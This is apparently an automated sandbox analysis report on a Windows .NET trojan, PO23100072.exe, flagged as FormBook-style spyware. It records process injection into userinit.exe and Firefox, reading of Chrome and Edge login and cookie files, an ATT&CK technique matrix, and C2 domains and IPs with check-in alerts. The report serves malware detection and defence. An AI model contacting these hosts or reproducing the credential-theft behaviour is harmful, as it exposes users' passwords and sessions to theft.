                NtTerminateThread: Direct from: 0x77462FCC
                NtAllocateVirtualMemory: Direct from: 0x77462BEC
                NtOpenKeyEx: Direct from: 0x77462B9C
            Source: C:\Users\user\Desktop\PO23100072.exe Section loaded: NULL target: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\PO23100072.exe Section loaded: NULL target: C:\Windows\SysWOW64\userinit.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: NULL target: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe protection: read write
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: NULL target: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\userinit.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\userinit.exe Thread register set: target process: 5600
            Source: C:\Windows\SysWOW64\userinit.exe Thread APC queued: target process: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
            Source: C:\Users\user\Desktop\PO23100072.exe Process created: C:\Users\user\Desktop\PO23100072.exe "C:\Users\user\Desktop\PO23100072.exe"
            Source: C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe Process created: C:\Windows\SysWOW64\userinit.exe "C:\Windows\SysWOW64\userinit.exe"
            Source: C:\Windows\SysWOW64\userinit.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: FrMKpuEiehQ.exe, 00000007.00000000.1582152308.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 00000007.00000002.3905901359.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000000.1730762757.00000000016C0000.00000002.00000001.00040000.00000000.sdmp
                Binary or memory string: Shell_TrayWnd
                Binary or memory string: Progman
                Binary or memory string: 0Program Manager
                Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\PO23100072.exe Queries volume information: C:\Users\user\Desktop\PO23100072.exe VolumeInformation
            Source: C:\Users\user\Desktop\PO23100072.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO23100072.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO23100072.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO23100072.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\PO23100072.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Users\user\Desktop\PO23100072.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match File source: 5.2.PO23100072.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.2.PO23100072.exe.400000.0.unpack, type: UNPACKEDPE
            Source: C:\Windows\SysWOW64\userinit.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\userinit.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\userinit.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\userinit.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\userinit.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\userinit.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\userinit.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\userinit.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\userinit.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match; File source: 5.2.PO23100072.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 5.2.PO23100072.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000A.00000002.3909668348.00000000054A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.3906350104.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000005.00000002.1665615488.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.3906324817.0000000004410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
| IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |

            Behavior Graph ID: 1517921, Sample: PO23100072.exe, Startdate: 25/09/2024, Architecture: WINDOWS, Score: 100


| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| PO23100072.exe | 53% | ReversingLabs | Win32.Trojan.Generic | |
| PO23100072.exe | 100% | Joe Sandbox ML | | |

            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
                                                              unknown
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchuserinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://t.me/AG09999userinit.exe, 00000009.00000002.3907399818.0000000004346000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.00000000035E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2014187374.0000000020AD6000.00000004.80000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO23100072.exe, 00000000.00000002.1480577595.0000000002B55000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://htmlcodex.com/credit-removaluserinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
209.74.95.29 | www.pofgof.pro | United States | 31744 | MULTIBAND-NEWHOPEUS | true
52.230.28.86 | xzwp.g.zxy-cname.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true
133.130.35.90 | komart.shop | Japan | 7506 | INTERQGMOInternetIncJP | true
188.114.96.3 | www.cc101.pro | European Union | 13335 | CLOUDFLARENETUS | true
198.252.106.191 | suarahati20.xyz | Canada | 20068 | HAWKHOSTCA | true
199.59.243.227 | 94950.bodis.com | United States | 395082 | BODIS-NJUS | true
52.223.13.41 | www.timetime.store | United States | 8987 | AMAZONEXPANSIONGB | true
84.32.84.32 | agilizeimob.app | Lithuania | 33922 | NTT-LT-ASLT | true
38.47.232.144 | yu35n.top | United States | 174 | COGENT-174US | true
3.33.130.190 | dhkatp.vip | United States | 8987 | AMAZONEXPANSIONGB | true
148.251.114.233 | eslameldaramlly.site | Germany | 24940 | HETZNER-ASDE | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1517921
Start date and time: 2024-09-25 09:14:19 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 20s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO23100072.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@13/7@18/11
                                                              EGA Information:
                                                              • Successful, ratio: 75%
                                                              HCA Information:
                                                              • Successful, ratio: 90%
                                                              • Number of executed functions: 76
                                                              • Number of non-executed functions: 273
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: PO23100072.exe
Time | Type | Description
03:15:17 | API Interceptor | 1x Sleep call for process: PO23100072.exe modified
03:15:20 | API Interceptor | 13x Sleep call for process: powershell.exe modified
03:16:15 | API Interceptor | 10987739x Sleep call for process: userinit.exe modified
Process: C:\Users\user\Desktop\PO23100072.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):2232
                                                              Entropy (8bit):5.380805901110357
                                                              Encrypted:false
                                                              SSDEEP:48:lylWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMugeC/ZM0Uyus:lGLHxvCZfIfSKRHmOugw1s
                                                              MD5:A6C11D5EB8FF113F746691904CC1C285
                                                              SHA1:85159530ED2933460F7D0793776D5FC2B1FAE500
                                                              SHA-256:7C1AA4858AF77BB1C1ADA78CE4816C4178A74E0A9CCFDB1E7F6A6FA3A08D6A1B
                                                              SHA-512:3460404875D62BD2318704741E443A0EF38352E977EEEE5EC7C39E6FCE9596D7E0F0A401780993697AE21FB68E2B9A9AF3A662667FB9EA48D7DD8E5B6148AF1E
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Process:C:\Windows\SysWOW64\userinit.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                              Category:dropped
                                                              Size (bytes):196608
                                                              Entropy (8bit):1.1209886597424439
                                                              Encrypted:false
                                                              SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                              MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                              SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                              SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                              SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                              Malicious:false
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):7.857918059400789
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              File name:PO23100072.exe
                                                              File size:695'296 bytes
                                                              MD5:b2a43d44c753d573caeb9160cb1da4a2
                                                              SHA1:873200a52f2bfd05cf5b708d87f8179486464fab
                                                              SHA256:405f4016376e02c97d8509d2627c7bb3be0583f46aa5a1ea57d96252b759f1f9
                                                              SHA512:944428969923998604a36d4a30da190c95e35d7e59fa474377c4312f2d5481435cbd8d4225e2e44766f7224f5aa95cbe1b916f1c5d655b3366d537074e6cb076
                                                              SSDEEP:12288:Wd058bQb7S2LSzV8sKxId7L8+g4yYGIU9FpJ8feieJ4ElZXuiFP96Z9V/:H2IOiSzV8s048+gwd8JpiiHbF0T
                                                              TLSH:D2E412802119E913C1865BF45832E2F817BA9DEDAD16C30BDBDA3DEF7D3A7421581392
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v.................0.................. ........@.. ....................................@................................
                                                              Icon Hash:00928e8e8686b000
                                                              Entrypoint:0x4ab0e2
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x9BF3D476 [Thu Nov 28 23:08:38 2052 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                              Instruction
                                                              jmp dword ptr [00402000h]
                                                              add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xab08e | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xac000 | 0x5a4 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xae000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa9f2c | 0x70 | .text |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xa90e8 | 0xa9200 | 781454ba697888eb6dc04d4f9940df05 | False | 0.9444795708610495 | data | 7.864814644611974 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xac000 | 0x5a4 | 0x600 | f0f749a399b413812afb6a033d425f10 | False | 0.4205729166666667 | data | 4.0826325181184275 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xae000 | 0xc | 0x200 | 7e87134e620355429cab8bfc0e9fba10 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_VERSION | 0xac090 | 0x314 | data | | | 0.4352791878172589 |
| RT_MANIFEST | 0xac3b4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-25T09:16:01.206157+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49712 | 188.114.96.3 | 80 | TCP |
| 2024-09-25T09:16:24.413193+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49717 | 199.59.243.227 | 80 | TCP |
| 2024-09-25T09:16:37.932974+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49722 | 198.252.106.191 | 80 | TCP |
| 2024-09-25T09:16:51.106407+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49727 | 3.33.130.190 | 80 | TCP |
| 2024-09-25T09:17:04.515185+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49731 | 148.251.114.233 | 80 | TCP |
| 2024-09-25T09:17:17.913750+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49735 | 209.74.95.29 | 80 | TCP |
| 2024-09-25T09:17:31.111467+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.8 | 49739 | 199.59.243.227 | 80 | TCP |
